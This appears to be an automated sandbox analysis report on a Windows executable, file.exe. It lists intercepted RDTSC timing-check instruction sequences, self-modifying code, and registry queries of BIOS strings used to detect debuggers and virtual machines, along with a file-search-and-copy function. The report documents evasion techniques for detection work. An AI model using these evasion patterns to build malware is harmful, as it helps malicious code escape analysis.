                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8E46 second address: 4F8E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F25EC6CB8E6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8E59 second address: 4F8E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F876E second address: 4F8774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8774 second address: 4F8785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 jg 00007F25ED41A9ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 447E48 second address: 447E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F25EC6CB8E6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502331 second address: 502341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnp 00007F25ED41A9E6h 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502636 second address: 50267F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F25EC6CB8F5h 0x0000000d push esi 0x0000000e jmp 00007F25EC6CB8F3h 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F25EC6CB8F1h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50267F second address: 502683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5027E6 second address: 5027EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5027EA second address: 5027F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502A92 second address: 502A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502A9C second address: 502AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F25ED41A9ECh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503369 second address: 50336D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503A4D second address: 503A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503A51 second address: 503A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503A55 second address: 503A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jc 00007F25ED41A9E6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503A7D second address: 503A89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503A89 second address: 503AAA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F25ED41A9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F25ED41A9F1h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E1D second address: 509E23 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E23 second address: 509E28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51168F second address: 511695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511695 second address: 5116B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F25ED41A9F4h 0x0000000d jc 00007F25ED41A9E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5116B7 second address: 5116C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8EEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5116C9 second address: 5116D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5116D3 second address: 5116DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F25EC6CB8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5116DD second address: 511718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F25ED41A9F8h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop esi 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511718 second address: 51171F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51171F second address: 511726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519261 second address: 519267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519267 second address: 51926B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51926B second address: 51926F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51CF50 second address: 51CF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F25ED41A9E6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 451DF1 second address: 451DF8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 451DF8 second address: 451E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C5B6 second address: 52C5C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F25EC6CB8EAh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C5C6 second address: 52C5CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537C59 second address: 537C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537C5D second address: 537C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9EFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537C72 second address: 537CC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F4h 0x00000007 jmp 00007F25EC6CB8F1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F25EC6CB8F7h 0x00000015 jmp 00007F25EC6CB8EDh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53666C second address: 536687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F25ED41A9E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53680C second address: 53681A instructions: 0x00000000 rdtsc 0x00000002 js 00007F25EC6CB8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53681A second address: 536824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536963 second address: 53697F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F25EC6CB8F5h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536EF8 second address: 536EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536EFC second address: 536F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F25EC6CB8E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F25EC6CB8E8h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53792A second address: 537930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537930 second address: 537936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537936 second address: 53793F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53793F second address: 537974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F4h 0x00000007 jmp 00007F25EC6CB8EAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jno 00007F25EC6CB8ECh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537974 second address: 537978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537978 second address: 53799D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8EBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F25EC6CB8F4h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53799D second address: 5379A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5379A4 second address: 5379AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5379AA second address: 5379B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F25ED41A9EEh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C2F4 second address: 53C2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C2F8 second address: 53C2FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C2FC second address: 53C308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F25EC6CB8E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C308 second address: 53C30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C30E second address: 53C314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C314 second address: 53C318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DF05 second address: 53DF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8F8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5593EB second address: 5593F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558F2B second address: 558F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558F2F second address: 558F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5590AA second address: 5590B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F25EC6CB8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5590B8 second address: 5590D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9F9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5590D5 second address: 559118 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jl 00007F25EC6CB8E6h 0x0000000d pop esi 0x0000000e push edi 0x0000000f jmp 00007F25EC6CB8EFh 0x00000014 pop edi 0x00000015 popad 0x00000016 pushad 0x00000017 jc 00007F25EC6CB8FCh 0x0000001d jmp 00007F25EC6CB8F6h 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568863 second address: 568867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568867 second address: 56886B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56886B second address: 568871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568AFB second address: 568AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568AFF second address: 568B0F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F25ED41A9E6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568B0F second address: 568B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568B13 second address: 568B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5694B3 second address: 5694BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5694BC second address: 5694C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C123 second address: 56C127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C127 second address: 56C12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C288 second address: 56C2A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F25EC6CB8E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C2A5 second address: 56C2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C341 second address: 56C3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 movsx edx, di 0x00000009 push 00000004h 0x0000000b add edx, 0BFABC00h 0x00000011 call 00007F25EC6CB8E9h 0x00000016 jmp 00007F25EC6CB8F4h 0x0000001b push eax 0x0000001c pushad 0x0000001d jmp 00007F25EC6CB8F0h 0x00000022 jnl 00007F25EC6CB8E8h 0x00000028 popad 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d jmp 00007F25EC6CB8F7h 0x00000032 mov eax, dword ptr [eax] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push ebx 0x00000039 pop ebx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C3AD second address: 56C3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C3B1 second address: 56C3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C3B7 second address: 56C3BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C3BD second address: 56C3D2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F25EC6CB8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C3D2 second address: 56C3D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C5D9 second address: 56C5DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D848 second address: 56D84D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D84D second address: 56D859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F25EC6CB8E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570EA1 second address: 570EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F25ED41A9E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570EB2 second address: 570EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD02DC second address: 4BD02E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD02E0 second address: 4BD02E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD02E6 second address: 4BD0303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F25ED41A9F9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0388 second address: 4BD0410 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushfd 0x0000000f jmp 00007F25EC6CB8F3h 0x00000014 jmp 00007F25EC6CB8F3h 0x00000019 popfd 0x0000001a pop eax 0x0000001b movsx edi, si 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 movzx ecx, di 0x00000025 pushfd 0x00000026 jmp 00007F25EC6CB8F3h 0x0000002b sub eax, 6D8EF4CEh 0x00000031 jmp 00007F25EC6CB8F9h 0x00000036 popfd 0x00000037 popad 0x00000038 pop ebp 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c mov bh, cl 0x0000003e rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2E1B12 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4AF71C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 49A412 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 50CCFF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_000938B0
